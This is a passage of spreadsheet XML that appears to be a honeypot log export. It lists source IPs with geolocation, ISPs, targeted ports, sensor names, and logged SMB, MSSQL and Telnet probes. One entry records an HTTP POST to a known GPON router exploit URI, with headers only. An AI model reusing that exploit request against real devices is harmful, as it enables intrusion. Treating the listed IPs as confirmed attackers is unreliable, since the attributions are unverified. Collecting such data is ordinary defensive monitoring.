    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (113.193.208.186,58999)}&amp;&amp;{Data_SMB:Incoming connection (113.193.208.186,59913)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.208.186,63264)}&amp;&amp;{Data_SMB:Incoming connection (113.193.208.186,63846)}&amp;&amp;{Data_MYSQL:NA}</t>
  </si>
  <si>
    <t>::ffff:71c1:d0ba</t>
  </si>
  <si>
    <t>428b3820f5cce932523a408c65167e1c</t>
  </si>
  <si>
    <t>81.231.227.195</t>
  </si>
  <si>
    <t>81-231-227-195-no2101.tbcn.telia.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>2002-10-04</t>
  </si>
  <si>
    <t>::ffff:51e7:e3c3</t>
  </si>
  <si>
    <t>11de824362e74902c48beae069053f51</t>
  </si>
  <si>
    <t>103.248.210.213</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H8</t>
  </si>
  <si>
    <t>Hyderabad (Matha Nagar)</t>
  </si>
  <si>
    <t>17.4243</t>
  </si>
  <si>
    <t>78.4552</t>
  </si>
  <si>
    <t>150008</t>
  </si>
  <si>
    <t>Pioneer Elabs Ltd.</t>
  </si>
  <si>
    <t>Viswaroopa Info Services India Private ltd</t>
  </si>
  <si>
    <t>Viswaroopa Info Services India Private Ltd</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.248.210.213,53526)}&amp;&amp;{Data_SMB:Incoming connection (103.248.210.213,54336)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.248.210.213,59001)}&amp;&amp;{Data_SMB:Incoming connection (103.248.210.213,59500)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.248.210.213,58891)}&amp;&amp;{Data_SMB:Incoming connection (103.248.210.213,59293)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:67f8:d2d5</t>
  </si>
  <si>
    <t>42f32e17d2cdd7bb04fa71746a6fa8e7</t>
  </si>
  <si>
    <t>45.67.20.213</t>
  </si>
  <si>
    <t>Vinnytsia</t>
  </si>
  <si>
    <t>Vinnytsya Raion</t>
  </si>
  <si>
    <t>689558</t>
  </si>
  <si>
    <t>49.2267</t>
  </si>
  <si>
    <t>28.4406</t>
  </si>
  <si>
    <t>49223</t>
  </si>
  <si>
    <t>EVEREST TV AND RADIO COMPANY LLC</t>
  </si>
  <si>
    <t>OOlshtynISP primary</t>
  </si>
  <si>
    <t>2019-02-15</t>
  </si>
  <si>
    <t>::ffff:2d43:14d5</t>
  </si>
  <si>
    <t>b4c49bee03408e07318e24fb11ec80d7</t>
  </si>
  <si>
    <t>190.202.4.238</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;2154&amp;&amp;1433</t>
  </si>
  <si>
    <t>Colón Municipality</t>
  </si>
  <si>
    <t>San Carlos del Zulia</t>
  </si>
  <si>
    <t>3628489</t>
  </si>
  <si>
    <t>9.00189</t>
  </si>
  <si>
    <t>-71.9105</t>
  </si>
  <si>
    <t>::ffff:beca:4ee</t>
  </si>
  <si>
    <t>bda519d8ba74c0172d89c4e52f8e5f7e</t>
  </si>
  <si>
    <t>152.59.95.201</t>
  </si>
  <si>
    <t>27.8668</t>
  </si>
  <si>
    <t>78.2527</t>
  </si>
  <si>
    <t>::ffff:983b:5fc9</t>
  </si>
  <si>
    <t>68d87b1c954e810520bced1168c4bbf9</t>
  </si>
  <si>
    <t>120.60.115.83</t>
  </si>
  <si>
    <t>::ffff:783c:7353</t>
  </si>
  <si>
    <t>d29989386a7d7f9f04773ebf9205b9fd</t>
  </si>
  <si>
    <t>61.2.150.58</t>
  </si>
  <si>
    <t>::ffff:3d02:963a</t>
  </si>
  <si>
    <t>9a97a8313ac2228fd24b97baee80673a</t>
  </si>
  <si>
    <t>117.216.23.156</t>
  </si>
  <si>
    <t>::ffff:75d8:179c</t>
  </si>
  <si>
    <t>74724f3f73bca7ea845b963be68316d4</t>
  </si>
  <si>
    <t>59.97.148.198</t>
  </si>
  <si>
    <t>::ffff:3b61:94c6</t>
  </si>
  <si>
    <t>5b801ba51e8a5f9bfb3baadb1eabd670</t>
  </si>
  <si>
    <t>59.178.205.58</t>
  </si>
  <si>
    <t>::ffff:3bb2:cd3a</t>
  </si>
  <si>
    <t>d3eb90f2a15be4e32926f8e1afc81623</t>
  </si>
  <si>
    <t>110.159.112.95</t>
  </si>
  <si>
    <t>::ffff:6e9f:705f</t>
  </si>
  <si>
    <t>151b5f3736e13cd2dcd7862aab0fd4cf</t>
  </si>
  <si>
    <t>106.51.22.148</t>
  </si>
  <si>
    <t>::ffff:6a33:1694</t>
  </si>
  <si>
    <t>eae8d19f7bbcb12bb21f43376c61dff8</t>
  </si>
  <si>
    <t>61.2.161.29</t>
  </si>
  <si>
    <t>::ffff:3d02:a11d</t>
  </si>
  <si>
    <t>44bc44ff288c3fabeeb86dcef5678342</t>
  </si>
  <si>
    <t>117.254.97.63</t>
  </si>
  <si>
    <t>::ffff:75fe:613f</t>
  </si>
  <si>
    <t>c51fd685992ac316f7639a36f9f0e1f7</t>
  </si>
  <si>
    <t>122.187.102.178</t>
  </si>
  <si>
    <t>::ffff:7abb:66b2</t>
  </si>
  <si>
    <t>4614339c6db1f8ad35e1ee9b27b74624</t>
  </si>
  <si>
    <t>202.66.167.21</t>
  </si>
  <si>
    <t>NA&amp;&amp;static-ip-21-167-66-202.rev.dyxnet.com</t>
  </si>
  <si>
    <t>2015-12-03</t>
  </si>
  <si>
    <t>R2NET</t>
  </si>
  <si>
    <t>::ffff:ca42:a715</t>
  </si>
  <si>
    <t>8ba372b0533579c40b30c620c69dbce5</t>
  </si>
  <si>
    <t>163.53.206.100</t>
  </si>
  <si>
    <t>Namakkal</t>
  </si>
  <si>
    <t>Komarapalayam</t>
  </si>
  <si>
    <t>8223943</t>
  </si>
  <si>
    <t>637209</t>
  </si>
  <si>
    <t>11.4363</t>
  </si>
  <si>
    <t>77.7232</t>
  </si>
  <si>
    <t>::ffff:a335:ce64</t>
  </si>
  <si>
    <t>9434b854b8edb4377f80b3ae9980997d</t>
  </si>
  <si>
    <t>217.219.121.162</t>
  </si>
  <si>
    <t>Hormozgan</t>
  </si>
  <si>
    <t>Bandar Abbas</t>
  </si>
  <si>
    <t>141681</t>
  </si>
  <si>
    <t>27.1832</t>
  </si>
  <si>
    <t>56.2666</t>
  </si>
  <si>
    <t>Telecommunication Company of Hormozgan</t>
  </si>
  <si>
    <t>::ffff:d9db:79a2</t>
  </si>
  <si>
    <t>804b2b79fdf7968c22ec66384a7def9f</t>
  </si>
  <si>
    <t>117.2.203.39</t>
  </si>
  <si>
    <t>1080&amp;&amp;5432&amp;&amp;59121</t>
  </si>
  <si>
    <t>{Data_SOCKS5:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7502:cb27</t>
  </si>
  <si>
    <t>7cd4f75e96f39e5df4eab7d73b909c2a</t>
  </si>
  <si>
    <t>180.252.204.15</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>TLKM_BB_SERVICE_180_252_DIVRE2</t>
  </si>
  <si>
    <t>{Data_SMB:Incoming connection (180.252.204.15,54076)}&amp;&amp;{Data_SMB:Incoming connection (180.252.204.15,55177)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:b4fc:cc0f</t>
  </si>
  <si>
    <t>9d28fbf23e8ecbcd0af8287081c22047</t>
  </si>
  <si>
    <t>109.120.137.236</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H12</t>
  </si>
  <si>
    <t>3306&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:6d78:89ec</t>
  </si>
  <si>
    <t>c86a376d35868f7673d519f4c29fe1a0</t>
  </si>
  <si>
    <t>81.214.244.145</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>::ffff:51d6:f491</t>
  </si>
  <si>
    <t>f6e697bf71b7fbf9bfe5cd137c4a4707</t>
  </si>
  <si>
    <t>103.56.182.193</t>
  </si>
  <si>
    <t>Bhavnagar</t>
  </si>
  <si>
    <t>Bhavnagar (Shilpi Nagar)</t>
  </si>
  <si>
    <t>1276032</t>
  </si>
  <si>
    <t>364001</t>
  </si>
  <si>
    <t>21.7699</t>
  </si>
  <si>
    <t>72.1438</t>
  </si>
  <si>
    <t>131215</t>
  </si>
  <si>
    <t>116 MADHAV DARSHAN</t>
  </si>
  <si>
    <t>for103.</t>
  </si>
  <si>
    <t>2015-05-05</t>
  </si>
  <si>
    <t>ADCOMMUNICATION</t>
  </si>
  <si>
    <t>::ffff:6738:b6c1</t>
  </si>
  <si>
    <t>a42446b6bfbc447077784ecfe0b116ba</t>
  </si>
  <si>
    <t>112.196.178.232</t>
  </si>
  <si>
    <t>28.5506</t>
  </si>
  <si>
    <t>77.2686</t>
  </si>
  <si>
    <t>45184</t>
  </si>
  <si>
    <t>DEN Networks Limited</t>
  </si>
  <si>
    <t>broadband users in Delhi</t>
  </si>
  <si>
    <t>2009-02-13</t>
  </si>
  <si>
    <t>DEN-IN</t>
  </si>
  <si>
    <t>::ffff:70c4:b2e8</t>
  </si>
  <si>
    <t>3706d82865c1da840924a9d244de8951</t>
  </si>
  <si>
    <t>117.235.31.247</t>
  </si>
  <si>
    <t>::ffff:75eb:1ff7</t>
  </si>
  <si>
    <t>02db771f2e1358fbcb10a7ca5c35668e</t>
  </si>
  <si>
    <t>36.236.132.69</t>
  </si>
  <si>
    <t>36-236-132-69.dynamic-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>23&amp;&amp;60469&amp;&amp;60928&amp;&amp;33786&amp;&amp;32923&amp;&amp;33608&amp;&amp;34981&amp;&amp;34298&amp;&amp;36359&amp;&amp;34978&amp;&amp;35670&amp;&amp;36355&amp;&amp;37738</t>
  </si>
  <si>
    <t>2011-01-20</t>
  </si>
  <si>
    <t>::ffff:24ec:8445</t>
  </si>
  <si>
    <t>9d49f30796cb40dbafda9758915d323d</t>
  </si>
  <si>
    <t>49.37.192.185</t>
  </si>
  <si>
    <t>JIO FTTX SUBSCRIBER</t>
  </si>
  <si>
    <t>::ffff:3125:c0b9</t>
  </si>
  <si>
    <t>5140e5a46bf4497e5a090ebf890138f3</t>
  </si>
  <si>
    <t>120.61.35.105</t>
  </si>
  <si>
    <t>Kunnamkulam</t>
  </si>
  <si>
    <t>1265579</t>
  </si>
  <si>
    <t>10.6467</t>
  </si>
  <si>
    <t>76.0669</t>
  </si>
  <si>
    <t>::ffff:783d:2369</t>
  </si>
  <si>
    <t>6ab92367a67f94de4a87104ce67a0e30</t>
  </si>
  <si>
    <t>117.207.163.250</t>
  </si>
  <si>
    <t>::ffff:75cf:a3fa</t>
  </si>
  <si>
    <t>733fb0193ad13645b19cd2c48960c9c1</t>
  </si>
  <si>
    <t>117.217.230.103</t>
  </si>
  <si>
    <t>::ffff:75d9:e667</t>
  </si>
  <si>
    <t>ccdcb42ec9e30c56e273a25ef67d6731</t>
  </si>
  <si>
    <t>5.200.233.32</t>
  </si>
  <si>
    <t>Golestan</t>
  </si>
  <si>
    <t>Gorgan</t>
  </si>
  <si>
    <t>132892</t>
  </si>
  <si>
    <t>36.8445</t>
  </si>
  <si>
    <t>54.4566</t>
  </si>
  <si>
    <t>::ffff:5c8:e920</t>
  </si>
  <si>
    <t>e5f93453902540591f0c8f3cadc35146</t>
  </si>
  <si>
    <t>217.236.70.8</t>
  </si>
  <si>
    <t>DTAG</t>
  </si>
  <si>
    <t>::ffff:d9ec:4608</t>
  </si>
  <si>
    <t>ca372bf23dd23d0012db4defa6550d2a</t>
  </si>
  <si>
    <t>117.232.6.200</t>
  </si>
  <si>
    <t>::ffff:75e8:6c8</t>
  </si>
  <si>
    <t>3c52c339ec4bf0e31bee4844db49b6a4</t>
  </si>
  <si>
    <t>59.182.208.164</t>
  </si>
  <si>
    <t>::ffff:3bb6:d0a4</t>
  </si>
  <si>
    <t>8b32309bce71a2b22e6c7bbb1776a196</t>
  </si>
  <si>
    <t>49.37.240.182</t>
  </si>
  <si>
    <t>RJIL South FTTX PUBLIC</t>
  </si>
  <si>
    <t>::ffff:3125:f0b6</t>
  </si>
  <si>
    <t>c80010132fb718bd24f4225196f302cd</t>
  </si>
  <si>
    <t>120.56.176.160</t>
  </si>
  <si>
    <t>Thanjavur</t>
  </si>
  <si>
    <t>Peravurani</t>
  </si>
  <si>
    <t>1259890</t>
  </si>
  <si>
    <t>10.2903</t>
  </si>
  <si>
    <t>79.2016</t>
  </si>
  <si>
    <t>::ffff:7838:b0a0</t>
  </si>
  <si>
    <t>68cdde98b22727d0c229ecd6c7f47c40</t>
  </si>
  <si>
    <t>135.237.126.225</t>
  </si>
  <si>
    <t>::ffff:87ed:7ee1</t>
  </si>
  <si>
    <t>a1b925e07fb39dc6470afe305ce73b07</t>
  </si>
  <si>
    <t>38.70.170.53</t>
  </si>
  <si>
    <t>36445</t>
  </si>
  <si>
    <t>Coextro</t>
  </si>
  <si>
    <t>Cogent communications - IPENG</t>
  </si>
  <si>
    <t>::ffff:2646:aa35</t>
  </si>
  <si>
    <t>1ca14a1fe85005ecc9a84bfc70faa32d</t>
  </si>
  <si>
    <t>211.253.117.156</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H33</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;45850&amp;&amp;2331&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>Naju-si (Jinheung-gil)</t>
  </si>
  <si>
    <t>1840535</t>
  </si>
  <si>
    <t>::ffff:d3fd:759c</t>
  </si>
  <si>
    <t>c5c7ab0c8a0c27e45feb24db3624014a</t>
  </si>
  <si>
    <t>117.210.201.193</t>
  </si>
  <si>
    <t>::ffff:75d2:c9c1</t>
  </si>
  <si>
    <t>56b139be2b0aac73338d8a39af98e1c8</t>
  </si>
  <si>
    <t>153.130.254.118</t>
  </si>
  <si>
    <t>p1252118-ipxg00a01kyoto.kyoto.ocn.ne.jp</t>
  </si>
  <si>
    <t>Kyoto</t>
  </si>
  <si>
    <t>Kyōto</t>
  </si>
  <si>
    <t>1857910</t>
  </si>
  <si>
    <t>35.0211</t>
  </si>
  <si>
    <t>135.754</t>
  </si>
  <si>
    <t>['ns1.ocn.ad.jp', 'ns2.ocn.ad.jp']</t>
  </si>
  <si>
    <t>Connected (2025/11/30)</t>
  </si>
  <si>
    <t>::ffff:9982:fe76</t>
  </si>
  <si>
    <t>2284fc6b412398179bcf9f623a2007bb</t>
  </si>
  <si>
    <t>59.92.196.75</t>
  </si>
  <si>
    <t>::ffff:3b5c:c44b</t>
  </si>
  <si>
    <t>efc5312f29034a9b995cd96839c039dd</t>
  </si>
  <si>
    <t>117.242.235.58</t>
  </si>
  <si>
    <t>::ffff:75f2:eb3a</t>
  </si>
  <si>
    <t>a0c98a839505fce9814ca2bde7232b36</t>
  </si>
  <si>
    <t>117.217.153.64</t>
  </si>
  <si>
    <t>::ffff:75d9:9940</t>
  </si>
  <si>
    <t>5348ea677532eb4ebe836efd4defd8b5</t>
  </si>
  <si>
    <t>219.89.194.232</t>
  </si>
  <si>
    <t>NA&amp;&amp;219-89-194-232.adsl.xtra.co.nz</t>
  </si>
  <si>
    <t>TIS</t>
  </si>
  <si>
    <t>::ffff:db59:c2e8</t>
  </si>
  <si>
    <t>a2321c99f652c80d1b66313d2a42f966</t>
  </si>
  <si>
    <t>103.163.44.227</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_SMB_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;22&amp;&amp;445</t>
  </si>
  <si>
    <t>Kanchipuram</t>
  </si>
  <si>
    <t>Nandambakkam (Poonamalle)</t>
  </si>
  <si>
    <t>1465879</t>
  </si>
  <si>
    <t>600056</t>
  </si>
  <si>
    <t>13.0288</t>
  </si>
  <si>
    <t>80.0342</t>
  </si>
  <si>
    <t>Infonet Accurate Appz India Pvt Ltd</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,62661)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,56124)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,50883)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,60514)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,60994)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,61533)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,62500)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,56458)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,56820)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,63242)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,63574)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,62753)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,60740)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,61130)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:67a3:2ce3</t>
  </si>
  <si>
    <t>9a35176224d24f29b37a8fb63318df33</t>
  </si>
  <si>
    <t>120.57.173.209</t>
  </si>
  <si>
    <t>::ffff:7839:add1</t>
  </si>
  <si>
    <t>527cf128d2c05469054c0db902b0ef25</t>
  </si>
  <si>
    <t>61.3.55.23</t>
  </si>
  <si>
    <t>::ffff:3d03:3717</t>
  </si>
  <si>
    <t>d05755847241272bf17d46a535517225</t>
  </si>
  <si>
    <t>114.40.43.172</t>
  </si>
  <si>
    <t>114-40-43-172.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>foreign@net-chinese.com.tw</t>
  </si>
  <si>
    <t>::ffff:7228:2bac</t>
  </si>
  <si>
    <t>8fd18d102257c75957fbd37ec52dfc90</t>
  </si>
  <si>
    <t>119.207.240.241</t>
  </si>
  <si>
    <t>Ansan-si</t>
  </si>
  <si>
    <t>Ansan-si (Danwon-gu)</t>
  </si>
  <si>
    <t>1846918</t>
  </si>
  <si>
    <t>37.3227</t>
  </si>
  <si>
    <t>126.791</t>
  </si>
  <si>
    <t>::ffff:77cf:f0f1</t>
  </si>
  <si>
    <t>76b4186f92e39c19dcd87bd91a27f21e</t>
  </si>
  <si>
    <t>27.35.81.53</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;43751</t>
  </si>
  <si>
    <t>Cheongju-si</t>
  </si>
  <si>
    <t>Cheongju-si (Jibuk-dong)</t>
  </si>
  <si>
    <t>1845604</t>
  </si>
  <si>
    <t>28759</t>
  </si>
  <si>
    <t>36.5946</t>
  </si>
  <si>
    <t>127.51</t>
  </si>
  <si>
    <t>9319</t>
  </si>
  <si>
    <t>HCN CHUNGBUK CABLE TV SYSTEMS</t>
  </si>
  <si>
    <t>HYUNDAI HCN Chungbuk Systems Co.Ltd</t>
  </si>
  <si>
    <t>Hyundai Communications Network</t>
  </si>
  <si>
    <t>::ffff:1b23:5135</t>
  </si>
  <si>
    <t>1adb346075d10e5ecc695a5cdd1d8bbd</t>
  </si>
  <si>
    <t>218.148.54.2</t>
  </si>
  <si>
    <t>::ffff:da94:3602</t>
  </si>
  <si>
    <t>614214a95ccd28fefd8f6272f97dd377</t>
  </si>
  <si>
    <t>59.182.190.106</t>
  </si>
  <si>
    <t>::ffff:3bb6:be6a</t>
  </si>
  <si>
    <t>1b8dddf9b1f44f70ca87a9338a8e4456</t>
  </si>
  <si>
    <t>103.229.184.166</t>
  </si>
  <si>
    <t>Bengaluru (Krishna Reddy Industrial Area)</t>
  </si>
  <si>
    <t>12.8922</t>
  </si>
  <si>
    <t>77.6423</t>
  </si>
  <si>
    <t>Myntra Designs Pvt Ltd</t>
  </si>
  <si>
    <t>IDNIC-KBIFOOD-ID</t>
  </si>
  <si>
    <t>{Data_SMB:Incoming connection (103.229.184.166,55462)}&amp;&amp;{Data_SMB:Incoming connection (103.229.184.166,55967)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.229.184.166,54570)}&amp;&amp;{Data_SMB:Incoming connection (103.229.184.166,55236)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:67e5:b8a6</t>
  </si>
  <si>
    <t>546e275700011aede460e25553bae487</t>
  </si>
  <si>
    <t>119.205.4.57</t>
  </si>
  <si>
    <t>::ffff:77cd:439</t>
  </si>
  <si>
    <t>fd084d8c0d91b8bebf8e235baf90e11d</t>
  </si>
  <si>
    <t>117.199.198.166</t>
  </si>
  <si>
    <t>::ffff:75c7:c6a6</t>
  </si>
  <si>
    <t>3d464aa1a35808f82c79fd1842061124</t>
  </si>
  <si>
    <t>103.189.207.157</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H15&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;39695&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>BB</t>
  </si>
  <si>
    <t>Bangka–Belitung Islands</t>
  </si>
  <si>
    <t>Belitung Regency</t>
  </si>
  <si>
    <t>Tanjung Pandan</t>
  </si>
  <si>
    <t>1624877</t>
  </si>
  <si>
    <t>-2.73353</t>
  </si>
  <si>
    <t>107.635</t>
  </si>
  <si>
    <t>38757</t>
  </si>
  <si>
    <t>PT INDONESIA COMNETS PLUS</t>
  </si>
  <si>
    <t>2022-06-16</t>
  </si>
  <si>
    <t>IDNIC-MEGATAMAINDO-ID</t>
  </si>
  <si>
    <t>query&amp;&amp;login&amp;&amp;connection</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08	
x0bx0c_x000D_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.189.207.157,61061)}&amp;&amp;{Data_SMB:Incoming connection (103.189.207.157,57104)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.189.207.157,54538)}&amp;&amp;{Data_SMB:Incoming connection (103.189.207.157,21611)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:67bd:cf9d</t>
  </si>
  <si>
    <t>c6e54841e836afdadc8c2df16198c947</t>
  </si>
  <si>
    <t>117.192.68.238</t>
  </si>
  <si>
    <t>::ffff:75c0:44ee</t>
  </si>
  <si>
    <t>a299a39297366c15a52490ac2ded8816</t>
  </si>
  <si>
    <t>45.164.177.138</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38</t>
  </si>
  <si>
    <t>23&amp;&amp;23&amp;&amp;37755&amp;&amp;NA&amp;&amp;80</t>
  </si>
  <si>
    <t>login&amp;&amp;connection&amp;&amp;NA&amp;&amp;POST</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '118', 'Host': '127.0.0.1:80', 'User-Agent': 'Hello, World', 'method': 'POST', 'uri': '/GponForm/diag_Form?images/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:2da4:b18a</t>
  </si>
  <si>
    <t>b33fb79bdcdab861737a10bde699ea42</t>
  </si>
  <si>
    <t>210.121.22.45</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>23&amp;&amp;43754</t>
  </si>
  <si>
    <t>45374</t>
  </si>
  <si>
    <t>CCS</t>
  </si>
  <si>
    <t>1996-11-26</t>
  </si>
  <si>
    <t>SEJONG</t>
  </si>
  <si>
    <t>::ffff:d279:162d</t>
  </si>
  <si>
    <t>dbccdc64e6068d42eecb502610b715a3</t>
  </si>
  <si>
    <t>117.206.27.74</t>
  </si>
  <si>
    <t>::ffff:75ce:1b4a</t>
  </si>
  <si>
    <t>75f48aef4ad574206900415c3a6cb860</t>
  </si>
  <si>
    <t>220.133.30.1</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-133-30-1.hinet-ip.hinet.net</t>
  </si>
  <si>
